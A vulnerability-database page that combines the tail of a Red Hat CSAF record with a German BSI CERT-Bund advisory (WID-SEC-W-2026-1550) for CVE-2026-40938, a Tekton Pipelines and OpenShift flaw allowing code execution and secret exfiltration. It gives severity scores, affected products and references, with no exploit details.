"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@ppc64le",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:24484"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@ppc64le",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@amd64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_darwin",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@arm64_windows",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@ppc64le",
"Red Hat OpenShift Pipelines 1.21.1:serve-tkn-cli-1-21-serve-tkn-cli@s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "github.com/tektoncd/pipeline: Tekton Pipelines: Arbitrary code execution and secret exfiltration via malicious git commands"
}
]
}
WID-SEC-W-2026-1550
Vulnerability from csaf_certbund - Published: 2026-05-14 22:00 - Updated: 2026-06-08 22:00Summary
Red Hat OpenShift: Schwachstelle ermöglicht Codeausführung und Offenlegung von Informationen
Severity
Hoch
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung: Red Hat OpenShift ist eine "Platform as a Service" (PaaS) Lösung zur Bereitstellung von Applikationen in der Cloud.
Angriff: Ein entfernter, authentisierter Angreifer kann eine Schwachstelle in Red Hat OpenShift ausnutzen, um beliebigen Programmcode auszuführen, und um Informationen offenzulegen.
Betroffene Betriebssysteme: - Linux
- UNIX
Affected products
Known affected
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Red Hat OpenShift <1.8.0
Red Hat / OpenShift
|
<1.8.0 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— |
References
5 references
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Red Hat OpenShift ist eine \"Platform as a Service\" (PaaS) L\u00f6sung zur Bereitstellung von Applikationen in der Cloud.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter, authentisierter Angreifer kann eine Schwachstelle in Red Hat OpenShift ausnutzen, um beliebigen Programmcode auszuf\u00fchren, und um Informationen offenzulegen.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux\n- UNIX",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2026-1550 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-1550.json"
},
{
"category": "self",
"summary": "WID-SEC-2026-1550 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-1550"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:17546 vom 2026-05-14",
"url": "https://access.redhat.com/errata/RHSA-2026:17546"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:24359 vom 2026-06-08",
"url": "https://access.redhat.com/errata/RHSA-2026:24359"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:24484 vom 2026-06-08",
"url": "https://access.redhat.com/errata/RHSA-2026:24484"
}
],
"source_lang": "en-US",
"title": "Red Hat OpenShift: Schwachstelle erm\u00f6glicht Codeausf\u00fchrung und Offenlegung von Informationen",
"tracking": {
"current_release_date": "2026-06-08T22:00:00.000+00:00",
"generator": {
"date": "2026-06-09T08:41:03.377+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.6.0"
}
},
"id": "WID-SEC-W-2026-1550",
"initial_release_date": "2026-05-14T22:00:00.000+00:00",
"revision_history": [
{
"date": "2026-05-14T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2026-06-07T22:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2026-06-08T22:00:00.000+00:00",
"number": "3",
"summary": "Neue Updates von Red Hat aufgenommen"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux",
"product": {
"name": "Red Hat Enterprise Linux",
"product_id": "67646",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:-"
}
}
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c1.8.0",
"product": {
"name": "Red Hat OpenShift \u003c1.8.0",
"product_id": "T054220"
}
},
{
"category": "product_version",
"name": "1.8.0",
"product": {
"name": "Red Hat OpenShift 1.8.0",
"product_id": "T054220-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:1.8.0"
}
}
}
],
"category": "product_name",
"name": "OpenShift"
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-40938",
"product_status": {
"known_affected": [
"T054220",
"67646"
]
},
"release_date": "2026-05-14T22:00:00.000+00:00",
"title": "CVE-2026-40938"
}
]
}
Loading…
Trend slope:
-
(linear fit over daily sighting counts)
Show additional events:
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…